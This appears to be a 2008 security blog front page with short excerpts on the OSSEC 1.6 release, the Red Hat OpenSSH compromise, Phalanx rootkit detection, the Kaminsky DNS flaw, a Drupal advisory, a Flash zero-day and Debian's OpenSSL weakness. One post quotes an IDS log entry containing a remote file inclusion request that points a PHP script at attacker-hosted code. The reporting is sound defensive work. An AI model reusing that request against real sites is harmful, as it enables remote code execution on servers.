Justin.MadIrish.net

On September 1, OSSEC announced the release of the latest version of the OSSEC-HIDS tool (version 1.6). This release includes many notable new features including:

• Support for Microsoft Vista/Server 2008
• Performance and stability enhancements on Windows
• Active response on windows
• Upgraded rootkit checking
• Added support for more log formats

For a full list of upgrades and enhancements check out the change log. OSSEC can be downloaded from http://www.ossec.net/main/downloads.

So this story has been floating around for a while, but if you haven't heard already several Red Hat servers, including some used for Fedora, were compromised in the last couple of weeks. Details were slow in emerging, but Red Hat has finally confirmed that some OpenSSH packages for Red Hat Enterprise (RHEL) 4 and 5 could have been compromised. Full details, including how to detect bad packages and updates, can be found at http://www.redhat.com/security/data/openssh-blacklist.html. The full Red Hat advisory can be found at https://rhn.redhat.com/errata/RHSA-2008-0855.html.

The CERT for Germany`s National Research and Education Network (DFN-CERT – Deutsches Forschungsnetz) is warning of a new spate of attacks using a variant of the Phalanx Linux rootkit. Once installed this rootkit harvests SSH keys and other credentials which an attacker can use to access other victims. Fortunately the rootkit seems fairly easy to detect if you know what to look for. The rootkit creates a hidden directory, /etc/khubd.p2/, that is used to collect information. This directory is hidden, and the rootkit uses methods to hide its running processes and other telltale signs of its existence. Sometimes the name of the hidden directory is changed, but if you try to 'cd' into the directory and it doesn't exist, you can try creating the directory and doing an 'ls' .

This was an interesting one: I just ran across this alert from my IDS:

66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] 
"GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252

It seems someone is trying to read in an arbitrary file as part of a script execution. Tracking down the file I found it contained the following code:

Most people are probably blissfully unaware, but security researcher Dan Kaminsky discovered a very serious flaw in DNS (Domain Name System) and was waiting until Black Hat to release the details. Well, as with all secrets, if more than one person knows it, soon it's not a secret. The vulnerability was announced two weeks ago by US CERT and major vendors have been working to apply patches. However, most of the public was unaware of how the vulnerability would affect them, or how an exploit would work.

The Drupal team released a critical announcement today advising that all users update their Drupal 5.x and 6.x installations. Several vulnerabilities exist within the Drupal core that could be used by remote attackers to exploit cross site scripting (XSS), session fixation and SQL injection vulnerabilities. Because it doesn't take attackers long to reverse engineer exploit code after a patch is released (see http://www.madirish.net/?article=212) it is important to upgrade your Drupal installation as soon as possible.

The full text of the announcement follows and can also be found at http://drupal.org/node/280571:

------------SA-2008-044 - DRUPAL CORE - MULTIPLE VULNERABILITIES------------

* Advisory ID: DRUPAL-SA-2008-044

* Project: Drupal core

* Version: 5x, 6.x

* Date: 2008-July-9

* Security risk: Moderately critical

* Exploitable from: Remote

* Vulnerability: Multiple vulnerabilities

------------DESCRIPTION------------

Security Focus is reporting a new, as of yet patched, exploit that targets Adobe Flash, are circulating. Apparently a Chinese malware package (MPack exploit kit) now includes attacks against Flash. The trouble thing about the report is that there are few details, and the software in question cannot be patched to prevent exploit (a so-called zero day, or 0day).

It seems Debian has introduced a critical flaw into the OpenSSL implementation that could allow an attacker to listen in on an encrypted web session or even an SSH session. What's worse is that even after an upgrade, old keys will still contain this vulnerability. This means that Debian (and Debian based systems - like Ubuntu) will have to patch/upgrade their systems and then regenerate all of their encryption keys. The Debian announcement can be found at Debian.org and the Ubuntu advisory can be found at Ubuntu.com. Update your systems as soon as you can!

Update:
It looks like code has been released to the wild to brute force ssh
keys to gain unauthorized access to servers running the bad openssl code
(with openssh and key authorization enabled):